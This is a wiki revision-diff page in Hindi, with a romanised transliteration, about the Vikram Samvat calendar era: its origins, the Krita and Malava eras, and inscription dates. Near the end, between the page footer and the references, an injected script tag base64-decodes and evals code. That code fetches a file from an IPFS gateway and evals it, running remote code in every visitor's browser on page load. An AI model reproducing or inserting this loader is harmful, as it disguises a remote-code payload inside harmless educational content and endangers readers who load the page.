Difference between revisions of "विक्रम संवत"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "==टीका टिप्पणी और संदर्भ==" to "{{संदर्भ ग्रंथ}} ==टीका टिप्पणी और संदर्भ==")
m (Text replace - " ई0" to " ई.")
Line 8: Line 8:
 
*यही बात तिथि तथा अंश (दिनांक) के सम्बन्ध में भी हैं वे भी [[सूर्य ग्रह|सूर्य]]-[[चंद्र ग्रह|चन्द्र]] की गति पर आश्रित हैं। सारांश यह कि यह संवत अपने अंग-उपांगों के साथ पूर्णत: वैज्ञानिक सत्यपर स्थित है।  
 
*यही बात तिथि तथा अंश (दिनांक) के सम्बन्ध में भी हैं वे भी [[सूर्य ग्रह|सूर्य]]-[[चंद्र ग्रह|चन्द्र]] की गति पर आश्रित हैं। सारांश यह कि यह संवत अपने अंग-उपांगों के साथ पूर्णत: वैज्ञानिक सत्यपर स्थित है।  
 
==शास्त्रों व शिलालेखों में==
 
==शास्त्रों व शिलालेखों में==
*विक्रम संवत के उद्भव एवं प्रयोग के विषय में कुछ कहना मुश्किल है। यही बात [[शक संवत]] के विषय में भी है। किसी विक्रमादित्य राजा के विषय में, जो ई0 पू0 57 में था, सन्देह प्रकट किए गए हैं। इस संवत का आरम्भ [[गुजरात]] में [[कार्तिक]] शुक्ल प्रतिपदा से (नवम्बर, ई0 पू0 58) है और उत्तरी भारत में [[चैत्र]] कृष्ण प्रतिपदा (अप्रैल, ई0 पू0 58) से। बीता हुआ विक्रम वर्ष  ईस्वी सन्+57 के बराबर है। कुछ आरम्भिक शिलालेखों में ये वर्ष कृत के नाम से आये हैं <ref>नन्द-यूप शिलालेख में 282 कृत वर्ष; तीन यूपों के मौखरी शिलालेखों में 295 कृत वर्ष; विजयगढ़ स्तम्भ-अभिलेख में 428; मन्दसौर में 461 तथा गदाधर में 480</ref>।  
+
*विक्रम संवत के उद्भव एवं प्रयोग के विषय में कुछ कहना मुश्किल है। यही बात [[शक संवत]] के विषय में भी है। किसी विक्रमादित्य राजा के विषय में, जो ई. पू0 57 में था, सन्देह प्रकट किए गए हैं। इस संवत का आरम्भ [[गुजरात]] में [[कार्तिक]] शुक्ल प्रतिपदा से (नवम्बर, ई. पू0 58) है और उत्तरी भारत में [[चैत्र]] कृष्ण प्रतिपदा (अप्रैल, ई. पू0 58) से। बीता हुआ विक्रम वर्ष  ईस्वी सन्+57 के बराबर है। कुछ आरम्भिक शिलालेखों में ये वर्ष कृत के नाम से आये हैं <ref>नन्द-यूप शिलालेख में 282 कृत वर्ष; तीन यूपों के मौखरी शिलालेखों में 295 कृत वर्ष; विजयगढ़ स्तम्भ-अभिलेख में 428; मन्दसौर में 461 तथा गदाधर में 480</ref>।  
*विद्वानों ने सामान्यतः 'कृत संवत' को 'विक्रम संवत' का पूर्ववर्ती माना है। किन्तु 'कृत' शब्द के प्रयोग की व्याख्या सन्तोषजनक नहीं की जा सकी है। कुछ शिलालेखों में मावल-गण का संवत उल्लिखित है, जैसे - नरवर्मा का मन्दसौर शिलालेख। 'कृत' एवं 'मालव' संवत एक ही कहे गए हैं, क्योंकि दोनों पूर्वी [[राजस्थान]] एवं पश्चिमी [[मालवा]] में प्रयोग में लाये गये हैं। कृत के 282 एवं 295 वर्ष तो मिलते हैं किन्तु मालव संवत के इतने प्राचीन शिलालेख नहीं मिलते। यह भी सम्भव है कि कृत नाम पुराना है और जब मालवों ने उसे अपना लिया तो वह 'मालव-गणाम्नात' या 'मालव-गण-स्थिति' के नाम से पुकारा जाने लगा। किन्तु यह कहा जा सकता है कि यदि कृत एवं मालव दोनों बाद में आने वाले विक्रम संवत की ओर ही संकेत करते हैं, तो दोनों एक साथ ही लगभग एक सौ वर्षों तक प्रयोग में आते रहे, क्योंकि हमें 480 कृत वर्ष एवं 461 मालव वर्ष प्राप्त होते हैं। यह मानना कठिन है कि कृत संवत का प्रयोग कृतयुग के आरम्भ से हुआ। यह सम्भव है कि 'कृत' का वही अर्थ है जो 'सिद्ध' का है जैसे - 'कृतान्त' का अर्थ है 'सिद्धान्त' और यह संकेत करता है कि यह कुछ लोगों की सहमति से प्रतिष्ठापित हुआ है। 8वीं एवं 9वीं शती से विक्रम संवत का नाम विशिष्ट रूप से मिलता है। [[संस्कृत]] के ज्योति:शास्त्रीय ग्रंथों में यह शक संवत से भिन्नता प्रदर्शित करने के लिए यह सामान्यतः केवल संवत नाम से प्रयोग किया गया है। 'चालुक्य विक्रमादित्य षष्ठ' के 'वेडरावे शिलालेख' से पता चलता है कि राजा ने शक संवत के स्थान पर 'चालुक्य विक्रम संवत' चलाया, जिसका प्रथम वर्ष था - 1076-77 ई0।
+
*विद्वानों ने सामान्यतः 'कृत संवत' को 'विक्रम संवत' का पूर्ववर्ती माना है। किन्तु 'कृत' शब्द के प्रयोग की व्याख्या सन्तोषजनक नहीं की जा सकी है। कुछ शिलालेखों में मावल-गण का संवत उल्लिखित है, जैसे - नरवर्मा का मन्दसौर शिलालेख। 'कृत' एवं 'मालव' संवत एक ही कहे गए हैं, क्योंकि दोनों पूर्वी [[राजस्थान]] एवं पश्चिमी [[मालवा]] में प्रयोग में लाये गये हैं। कृत के 282 एवं 295 वर्ष तो मिलते हैं किन्तु मालव संवत के इतने प्राचीन शिलालेख नहीं मिलते। यह भी सम्भव है कि कृत नाम पुराना है और जब मालवों ने उसे अपना लिया तो वह 'मालव-गणाम्नात' या 'मालव-गण-स्थिति' के नाम से पुकारा जाने लगा। किन्तु यह कहा जा सकता है कि यदि कृत एवं मालव दोनों बाद में आने वाले विक्रम संवत की ओर ही संकेत करते हैं, तो दोनों एक साथ ही लगभग एक सौ वर्षों तक प्रयोग में आते रहे, क्योंकि हमें 480 कृत वर्ष एवं 461 मालव वर्ष प्राप्त होते हैं। यह मानना कठिन है कि कृत संवत का प्रयोग कृतयुग के आरम्भ से हुआ। यह सम्भव है कि 'कृत' का वही अर्थ है जो 'सिद्ध' का है जैसे - 'कृतान्त' का अर्थ है 'सिद्धान्त' और यह संकेत करता है कि यह कुछ लोगों की सहमति से प्रतिष्ठापित हुआ है। 8वीं एवं 9वीं शती से विक्रम संवत का नाम विशिष्ट रूप से मिलता है। [[संस्कृत]] के ज्योति:शास्त्रीय ग्रंथों में यह शक संवत से भिन्नता प्रदर्शित करने के लिए यह सामान्यतः केवल संवत नाम से प्रयोग किया गया है। 'चालुक्य विक्रमादित्य षष्ठ' के 'वेडरावे शिलालेख' से पता चलता है कि राजा ने शक संवत के स्थान पर 'चालुक्य विक्रम संवत' चलाया, जिसका प्रथम वर्ष था - 1076-77 ई.।
  
 
{{प्रचार}}
 
{{प्रचार}}

Revision as of 12:05, 22 March 2011

  • bharatiy sanvat atyant prachin haian.
  • sath hi ye ganit ki drishti se atyant sugam aur sarvatha thik hisab rakhakar nishchit kiye gaye haian.
  • navin sanvat chalane ki shastriy vidhi yah hai ki jis naresh ko apana sanvat chalana ho, use sanvat chalane ke din se poorv kam-se-kam apane poore rajy mean jitane bhi log kisi ke rrini hoan, unaka rrin apani or se chuka dena chahiye.
  • vikram sanvat ka praneta samrat vikramadity ko mana jata hai. kalidas is maharaja ke ek ratn mane jate haian.
  • kahana nahian hoga ki bharat ke bahar is niyam ka kahian palan nahian hua.
  • bharat mean bhi mahapurushoan ke sanvat unake anuyayiyoan ne shraddhavash hi chalaye; lekin bharat ka sarvamany sanvat vikram sanvat hai aur maharaj vikramadity ne desh ke sampoorn rrin ko, chahe vah jis vyakti ka raha ho, svayan dekar ise chalaya hai.
  • is sanvat ke mahinoan ke nam videshi sanvatoan ki bhaanti devata, manushy ya sankhyavachak kritrim nam nahian haian.
  • yahi bat tithi tatha aansh (dinaank) ke sambandh mean bhi haian ve bhi soory-chandr ki gati par ashrit haian. saraansh yah ki yah sanvat apane aang-upaangoan ke sath poornat: vaijnanik satyapar sthit hai.

shastroan v shilalekhoan mean

  • vikram sanvat ke udbhav evan prayog ke vishay mean kuchh kahana mushkil hai. yahi bat shak sanvat ke vishay mean bhi hai. kisi vikramadity raja ke vishay mean, jo ee. poo0 57 mean tha, sandeh prakat kie ge haian. is sanvat ka arambh gujarat mean kartik shukl pratipada se (navambar, ee. poo0 58) hai aur uttari bharat mean chaitr krishna pratipada (aprail, ee. poo0 58) se. bita hua vikram varsh eesvi sanh+57 ke barabar hai. kuchh arambhik shilalekhoan mean ye varsh krit ke nam se aye haian [1].
  • vidvanoan ne samanyatah 'krit sanvat' ko 'vikram sanvat' ka poorvavarti mana hai. kintu 'krit' shabd ke prayog ki vyakhya santoshajanak nahian ki ja saki hai. kuchh shilalekhoan mean maval-gan ka sanvat ullikhit hai, jaise - naravarma ka mandasaur shilalekh. 'krit' evan 'malav' sanvat ek hi kahe ge haian, kyoanki donoan poorvi rajasthan evan pashchimi malava mean prayog mean laye gaye haian. krit ke 282 evan 295 varsh to milate haian kintu malav sanvat ke itane prachin shilalekh nahian milate. yah bhi sambhav hai ki krit nam purana hai aur jab malavoan ne use apana liya to vah 'malav-ganamnat' ya 'malav-gan-sthiti' ke nam se pukara jane laga. kintu yah kaha ja sakata hai ki yadi krit evan malav donoan bad mean ane vale vikram sanvat ki or hi sanket karate haian, to donoan ek sath hi lagabhag ek sau varshoan tak prayog mean ate rahe, kyoanki hamean 480 krit varsh evan 461 malav varsh prapt hote haian. yah manana kathin hai ki krit sanvat ka prayog kritayug ke arambh se hua. yah sambhav hai ki 'krit' ka vahi arth hai jo 'siddh' ka hai jaise - 'kritant' ka arth hai 'siddhant' aur yah sanket karata hai ki yah kuchh logoan ki sahamati se pratishthapit hua hai. 8vian evan 9vian shati se vikram sanvat ka nam vishisht roop se milata hai. sanskrit ke jyoti:shastriy granthoan mean yah shak sanvat se bhinnata pradarshit karane ke lie yah samanyatah keval sanvat nam se prayog kiya gaya hai. 'chaluky vikramadity shashth' ke 'vedarave shilalekh' se pata chalata hai ki raja ne shak sanvat ke sthan par 'chaluky vikram sanvat' chalaya, jisaka pratham varsh tha - 1076-77 ee..


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. nand-yoop shilalekh mean 282 krit varsh; tin yoopoan ke maukhari shilalekhoan mean 295 krit varsh; vijayagadh stambh-abhilekh mean 428; mandasaur mean 461 tatha gadadhar mean 480

sanbandhit lekh